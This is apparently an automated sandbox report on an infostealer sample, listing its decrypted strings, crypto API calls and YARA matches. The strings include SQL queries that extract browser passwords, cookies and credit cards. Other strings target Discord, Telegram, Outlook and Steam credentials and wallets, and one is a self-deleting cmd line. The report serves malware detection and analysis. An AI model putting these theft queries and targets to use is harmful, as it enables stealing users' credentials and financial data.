                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: StrCmpCW
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: PathMatchSpecA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GetModuleFileNameExA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: RmStartSession
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: RmRegisterResources
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: RmGetList
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: RmEndSession
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: sqlite3_open
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: sqlite3_prepare_v2
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: sqlite3_step
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: sqlite3_column_text
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: sqlite3_finalize
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: sqlite3_close
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: sqlite3_column_bytes
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: sqlite3_column_blob
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: encrypted_key
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: PATH
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: C:\ProgramData\nss3.dll
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: NSS_Init
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: NSS_Shutdown
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: PK11_GetInternalKeySlot
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: PK11_FreeSlot
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: PK11_Authenticate
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: PK11SDR_Decrypt
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: C:\ProgramData\
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: browser:
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: profile:
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: url:
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: login:
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: password:
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: Opera
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: OperaGX
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: Network
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: cookies
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: .txt
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: TRUE
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: FALSE
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: autofill
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: SELECT name, value FROM autofill
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: history
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: name:
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: month:
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: year:
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: card:
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: Cookies
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: Login Data
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: Web Data
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: History
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: logins.json
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: formSubmitURL
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: usernameField
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: encryptedUsername
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: encryptedPassword
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: guid
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: cookies.sqlite
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: formhistory.sqlite
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: places.sqlite
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: plugins
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: Local Extension Settings
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: Sync Extension Settings
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: IndexedDB
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: Opera Stable
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: Opera GX Stable
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: CURRENT
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: chrome-extension_
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: _0.indexeddb.leveldb
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: Local State
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: profiles.ini
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: chrome
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: opera
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: firefox
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: wallets
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: %08lX%04lX%lu
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: ProductName
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: %d/%d/%d %d:%d:%d
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: ProcessorNameString
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: DisplayName
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: DisplayVersion
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: Network Info:
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: - IP: IP?
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: - Country: ISO?
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: System Summary:
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: - HWID:
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: - OS:
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: - Architecture:
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: - UserName:
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: - Computer Name:
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: - Local Time:
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: - UTC:
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: - Language:
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: - Keyboards:
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: - Laptop:
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: - Running Path:
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: - CPU:
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: - Threads:
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: - Cores:
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: - RAM:
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: - Display Resolution:
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: - GPU:
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: User Agents:
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: Installed Apps:
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: All Users:
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: Current User:
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: Process List:
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: system_info.txt
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: freebl3.dll
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: mozglue.dll
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: msvcp140.dll
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: nss3.dll
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: softokn3.dll
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: vcruntime140.dll
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: \Temp\
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: .exe
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: runas
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: open
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: /c start
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: %DESKTOP%
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: %APPDATA%
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: %LOCALAPPDATA%
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: %USERPROFILE%
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: %DOCUMENTS%
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: %PROGRAMFILES%
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: %PROGRAMFILES_86%
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: %RECENT%
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: *.lnk
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: files
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: \discord\
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: \Local Storage\leveldb\CURRENT
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: \Local Storage\leveldb
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: \Telegram Desktop\
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: key_datas
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: D877F783D5D3EF8C*
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: map*
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: A7FDF864FBC10B77*
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: A92DAA6EA6F891F2*
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: F8806DD0C461824F*
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: Telegram
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: *.tox
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: *.ini
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: Password
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: 00000001
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: 00000002
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: 00000003
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: 00000004
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: \Outlook\accounts.txt
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: Pidgin
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: \.purple\
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: accounts.xml
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: dQw4w9WgXcQ
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: token:
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: Software\Valve\Steam
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: SteamPath
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: \config\
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: ssfn*
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: config.vdf
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: DialogConfig.vdf
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: DialogConfigOverlay*.vdf
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: libraryfolders.vdf
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: loginusers.vdf
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: \Steam\
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: sqlite3.dll
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: browsers
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: done
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: soft
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: \Discord\tokens.txt
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: /c timeout /t 5 & del /f /q "
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: C:\Windows\system32\cmd.exe
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: https
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: POST
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: HTTP/1.1
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: Content-Disposition: form-data; name="
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: hwid
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: build
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: token
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: file_name
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: file
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: message
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: screenshot.jpg
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree,10_2_00409540
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_004155A0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,10_2_004155A0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,10_2_00406C10
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,10_2_004094A0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,10_2_0040BF90
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C206C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,10_2_6C206C80
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C35A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,10_2_6C35A9A0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C324420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,10_2_6C324420
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C354440 PK11_PrivDecrypt,10_2_6C354440
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C3544C0 PK11_PubEncrypt,10_2_6C3544C0
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_00864280 CreateFileW,GetLastError,GetFileSize,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,__allrem,ReadFile,CryptDecrypt,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,18_2_00864280
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeCode function: 18_2_008645A0 CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptDeriveKey,CryptDestroyHash,CryptReleaseContext,18_2_008645A0

                            Exploits

                            barindex
                            Source: Yara matchFile source: 22.2.cmd.exe.52f0e64.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 22.2.cmd.exe.52f0264.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.UniversalInstaller.exe.43e9d5b.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 30.2.UniversalInstaller.exe.3e3015b.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 31.2.cmd.exe.54dd976.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 22.2.cmd.exe.52ac976.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 31.2.cmd.exe.5521e64.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.UniversalInstaller.exe.43e915b.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 20.2.UniversalInstaller.exe.36f286d.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 20.2.UniversalInstaller.exe.373615b.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 31.2.cmd.exe.5521264.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 30.2.UniversalInstaller.exe.3e30d5b.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 20.2.UniversalInstaller.exe.3736d5b.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 30.2.UniversalInstaller.exe.3dec86d.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.UniversalInstaller.exe.43a586d.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000001E.00000002.1802561648.0000000003DE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000002.2050713251.00000000054D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: UniversalInstaller.exe PID: 7176, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: UniversalInstaller.exe PID: 7228, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7404, type: MEMORYSTR

                            Compliance

                            barindex
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeUnpacked PE file: 0.2.zLwT7vCojz.exe.400000.0.unpack
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeUnpacked PE file: 10.2.u48o.0.exe.400000.0.unpack
                            Source: zLwT7vCojz.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                            Source: unknownHTTPS traffic detected: 169.150.236.99:443 -> 192.168.2.7:49715 version: TLS 1.2
                            Source: Binary string: mozglue.pdbP source: u48o.0.exe, 0000000A.00000002.1716466376.000000006C26D000.00000002.00000001.01000000.00000016.sdmp
                            Source: Binary string: /_/obj/Release/Microsoft.ApplicationInsights/net46/Microsoft.ApplicationInsights.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2658504863.0000025672980000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: nss3.pdb@ source: u48o.0.exe, 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmp
                            Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveHUD\obj\Debug\PerceiveHUD.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Cleanup\obj\Release\Cleanup.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2517001138.00000256583E0000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: c:\release\WorkingDir\PrismLibraryBuild\PrismLibrary\Desktop\Prism\obj\Release\Microsoft.Practices.Prism.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2521152454.0000025659B80000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: wntdll.pdb source: Qg_Appv5.exe, 0000000D.00000002.1448048593.0000000005170000.00000004.00000800.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1426785944.0000000003140000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1386928542.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388922444.00000000044D0000.00000004.00000800.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475980703.0000000003828000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1477591260.0000000003B80000.00000004.00000800.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1480438511.000000000403F000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713172266.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713421487.00000000053D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb| source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: mozglue.pdb source: u48o.0.exe, 0000000A.00000002.1716466376.000000006C26D000.00000002.00000001.01000000.00000016.sdmp
